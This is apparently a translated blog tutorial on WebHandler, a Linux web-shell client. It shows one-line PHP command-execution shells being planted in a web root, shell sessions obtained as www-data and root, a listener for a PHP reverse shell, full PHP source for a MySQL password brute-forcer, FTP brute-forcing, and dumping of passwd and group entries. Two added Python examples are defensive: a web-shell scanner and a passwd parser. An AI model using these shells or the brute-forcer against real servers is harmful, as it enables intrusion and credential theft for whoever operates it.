
The Linux version of "China Chopper": WEBhandler

2013-01-08 01:10

Installation:

root@ashker:/pen/door# wget http://dis9-server.googlecode.com/files/webhandler.zip

root@ashker:/pen/door# unzip webhandler.zip

root@ashker:/pen/door# cd webhandler

root@ashker:/pen/door/webhandler# apt-get install python-setuptools

root@ashker:/pen/door/webhandler# easy_install argparse

Client usage
GET submission:
root@ashker:/var/www# echo '<?php system($_GET['cmd']); ?>' > /var/www/get.php
Connect:
root@ashker:/pen/door/webhandler# python2.7 webhandler.py --url http://5.5.5.3/get.php?cmd=
[WebHandler ASCII-art banner]
-------------------------------------------------------------------------
 [!] "non-git". Keep up-to-date by running '--update'
-----------------------------------------------------------
User         : www-data
ID           : uid=33(www-data) gid=33(www-data) groups=33(www-data)
Kernel       : Linux ubuntu 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux
CWD          : /var/www drwxrwxrwx
Uptime       : 4 minutes
Target's IPs : 5.5.5.3
Our IP       : 110.110.10.1
---------------------------------------------
[+] Available commands: @backdoor, @download, @enum, @history, @info, @update, @upload, @brute, clear, exit
[+] Inserting ! at the begining of the command will execute the command locally (on your box)
www-data@5.5.5.3:~(/var/www):$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@5.5.5.3:~(/var/www):$
POST submission:
root@ubuntu:/var/www# echo '<?php echo exec($_POST['cmd']); ?>' > post.php
Connect:
root@ashker:/pen/door/webhandler# python2.7 webhandler.py --url http://5.5.5.3/post.php --method POST --parameter cmd
[WebHandler ASCII-art banner]
-----------------------------------------------------------
 [!] "non-git". Keep up-to-date by running '--update'
-----------------------
User         : 5.5.5.3
ID           : Unknown
Kernel       : Unknown
CWD          : Unknown Unknown
Uptime       : Unknown
Target's IPs : Unknow
Our IP       : 110.110.10.1
-----------------------
[+] Available commands: @backdoor, @download, @enum, @history, @info, @update, @upload, @brute, clear, exit
[+] Inserting ! at the begining of the command will execute the command locally (on your box)
5.5.5.3@Unknow:~(Unknown):$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
5.5.5.3@Unknow:~(Unknown):$
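Both get.php and post.php above are one-line shells that pass a request parameter straight into a command-execution function, and that data flow is exactly what a defender scans a web root for after an incident. The script below is an added example written for this article, not part of the WebHandler project: it reads PHP source, flags a sink (system, exec, passthru, ...) called on a request superglobal, and also catches the one-hop variant where the parameter is first copied into a local variable. The sample files are constructed; the first two are the shells written on this page.

```python
"""Flag PHP files where request input reaches a command-execution sink.

Added example (not WebHandler code): the shells system($_GET['cmd']) and
exec($_POST['cmd']) from the article are the pattern found here. SAMPLES is
constructed for the demonstration.
"""
import re
from typing import Dict, List, Set, Tuple

# PHP functions that run a string as a shell command or as PHP code.
SINKS = r"\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\b"
# Request superglobals whose content the HTTP client controls.
SOURCES = r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]*\]"

# A sink called directly on a request superglobal, e.g. system($_GET['cmd']).
DIRECT = re.compile(SINKS + r"\s*\(\s*" + SOURCES)
# A request superglobal copied into a local variable, e.g. $c = $_POST['cmd'].
ASSIGN = re.compile(r"(\$[A-Za-z_]\w*)\s*=\s*" + SOURCES)

Finding = Tuple[int, str]  # (line number, stripped source line)


def find_webshell_sinks(source: str) -> List[Finding]:
    """Lines where request input reaches a sink, directly or via one assignment."""
    findings: List[Finding] = []
    tainted: Set[str] = set()  # variables assigned from a request superglobal so far
    for lineno, line in enumerate(source.splitlines(), 1):
        if DIRECT.search(line):
            findings.append((lineno, line.strip()))
            continue
        assigned = ASSIGN.search(line)
        if assigned:
            tainted.add(assigned.group(1))
        for var in tainted:
            # the escaped variable name followed by a word boundary, e.g. \$c\b
            if re.search(SINKS + r"\s*\(\s*" + re.escape(var) + r"\b", line):
                findings.append((lineno, line.strip()))
                break
    return findings


def scan_files(files: Dict[str, str]) -> Dict[str, List[Finding]]:
    """Scan a mapping of path -> PHP source and keep only files with findings."""
    report: Dict[str, List[Finding]] = {}
    for path, src in files.items():
        hits = find_webshell_sinks(src)
        if hits:
            report[path] = hits
    return report


# Constructed samples: the two shells written on the page, an indirect variant,
# and a clean file that only echoes a request parameter.
SAMPLES: Dict[str, str] = {
    "/var/www/get.php": "<?php system($_GET['cmd']); ?>\n",
    "/var/www/post.php": "<?php echo exec($_POST['cmd']); ?>\n",
    "/var/www/indirect.php": "<?php\n$c = $_REQUEST['x'];\npassthru($c);\n",
    "/var/www/search.php": "<?php echo htmlspecialchars($_GET['q']); ?>\n",
}

if __name__ == "__main__":
    for path, hits in scan_files(SAMPLES).items():
        for lineno, text in hits:
            print(f"{path}:{lineno}: {text}")
```

On a real web root you would feed scan_files the contents of every .php file under the document root; a hit is a candidate for review, not proof, because the same call shape appears in legitimate admin scripts, so check the file's owner, mtime and whether it is in version control before acting on it.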
Listen mode
First listen on a port:
root@ashker:/pen/door/webhandler# python2.7 webhandler.py --listen 1234
[!] "non-git". Keep up-to-date by running '--update'
[i] Waiting on port: 1234
Then run a PHP reverse shell on the target to obtain a shell.
Get system information:
root@5.5.5.3:~(/var/www):$ @info
----------------------------------------------------------
User         : root
ID           : uid=0(root) gid=0(root) groups=0(root)
Kernel       : Linux ubuntu 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux
CWD          : /var/www drwxrwxrwx
Uptime       : 11 minutes
Target's IPs : 5.5.5.3
Our IP       : 110.110.10.1
--------------------------------------------------------
[+] Available commands: @backdoor, @download, @enum, @history, @info, @update, @upload, @brute, clear, exit
[+] Inserting ! at the begining of the command will execute the command locally (on your box)
root@5.5.5.3:~(/var/www):$
Brute-forcing MySQL:
Default wordlist: modules/bruters/wordlist.txt; it is uploaded automatically.
This module is fairly heavy on the target's processes and is single-threaded as well, so use it with care.
Core code:
#!/usr/bin/env php
<?php
error_reporting(0);
$host = "127.0.0.1";
// the same wordlist is used for user names and for passwords
$user_dict = "wordlist.txt";
$pass_dict = "wordlist.txt";
$userFile = file($user_dict);
$passFile = file($pass_dict);
$success = 0;
foreach ($userFile as $user) {
    if ($success == 1) {
        break;
    }
    foreach ($passFile as $pass) {
        $user = trim($user);
        $pass = trim($pass);
        $connection = mysql_connect($host, $user, $pass);
        if ($connection) {
            echo "success:" . $user . ":" . $pass . "\n";
            $success = 1;
            mysql_close($connection);
            break;
        }
    }
}
?>
Brute-forcing FTP
Same as above:
5.5.5.3@Unknow:~(Unknown):$ @brute ftp
Listing groups and users:
5.5.5.3@Unknow:~(Unknown):$ @enum group
[+] Total number of groups: 1
-------------------------------------------------------
Group Name      | Password    | Group ID | Group List |
-------------------------------------------------------
honeyd          | *In shadow* | 115      |            |
-------------------------------------------------------
5.5.5.3@Unknow:~(Unknown):$ @enum passwd
[+] Total number of users: 1
-----------------------------------------------------------------------------------------------------------------------------------
Username          | Password    | User ID | Group ID | User Info                           | Home Directory               | Shell
-----------------------------------------------------------------------------------------------------------------------------------
b                 | *In shadow* | 1004    | 33       |                                     | /dev/null                    | /usr/sbin/nologin
-----------------------------------------------------------------------------------------------------------------------------------
5.5.5.3@Unknow:~(Unknown):$
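The @enum output is just /etc/group and /etc/passwd split on ":" with the password column rewritten: an "x" in that field means the hash lives in /etc/shadow or /etc/gshadow, which is what the tool prints as "*In shadow*". The following is an added example, not WebHandler's module code, that reproduces those tables from raw passwd and group lines and adds one check a defender reviewing such a listing usually wants: which accounts have a shell that permits an interactive login. The input lines are constructed to match the two rows above, plus a root entry.

```python
"""Parse /etc/passwd and /etc/group into the tables that @enum prints.

Added example; not WebHandler's own code. PASSWD_SAMPLE and GROUP_SAMPLE are
constructed to reproduce the rows shown in the article's output.
"""
from typing import Dict, List

PASSWD_FIELDS = ["Username", "Password", "User ID", "Group ID",
                 "User Info", "Home Directory", "Shell"]
GROUP_FIELDS = ["Group Name", "Password", "Group ID", "Group List"]

# Shells that refuse interactive logins; any other shell allows one.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}

Row = Dict[str, str]


def _password_label(field: str) -> str:
    """'x' or '*' means the real hash lives in /etc/shadow or /etc/gshadow."""
    if field in ("x", "*"):
        return "*In shadow*"
    if field == "":
        return "*Empty*"  # label chosen here, not the tool's: a blank field is no password at all
    return field  # a hash stored directly in the file (legacy layouts)


def _parse(text: str, fields: List[str]) -> List[Row]:
    rows: List[Row] = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != len(fields):
            continue  # malformed line: skip it rather than shift the columns
        row = dict(zip(fields, parts))
        row["Password"] = _password_label(row["Password"])
        rows.append(row)
    return rows


def parse_passwd(text: str) -> List[Row]:
    return _parse(text, PASSWD_FIELDS)


def parse_group(text: str) -> List[Row]:
    return _parse(text, GROUP_FIELDS)


def interactive_accounts(rows: List[Row]) -> List[str]:
    """Usernames whose shell allows an interactive login."""
    return [r["Username"] for r in rows if r["Shell"] not in NOLOGIN_SHELLS]


def render_table(fields: List[str], rows: List[Row]) -> str:
    """Pipe-separated table with a dashed rule above and below the rows."""
    widths = {f: max([len(f)] + [len(r[f]) for r in rows]) for f in fields}
    fmt = " | ".join("{:<%d}" % widths[f] for f in fields)
    header = fmt.format(*fields)
    rule = "-" * len(header)
    body = [fmt.format(*[row[f] for f in fields]) for row in rows]
    return "\n".join([rule, header, rule] + body + [rule])


# Constructed input: the two rows from the article plus a root entry.
PASSWD_SAMPLE = "b:x:1004:33::/dev/null:/usr/sbin/nologin\nroot:x:0:0:root:/root:/bin/bash\n"
GROUP_SAMPLE = "honeyd:x:115:\n"

if __name__ == "__main__":
    users = parse_passwd(PASSWD_SAMPLE)
    print(render_table(PASSWD_FIELDS, users))
    print("interactive:", interactive_accounts(users))
    print(render_table(GROUP_FIELDS, parse_group(GROUP_SAMPLE)))
```

Read the real files with open("/etc/passwd").read() in place of the samples; the malformed-line check matters there because a stray trailing line is the usual cause of a misaligned table.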
Source: www.ashker.net/index.php/archives/598
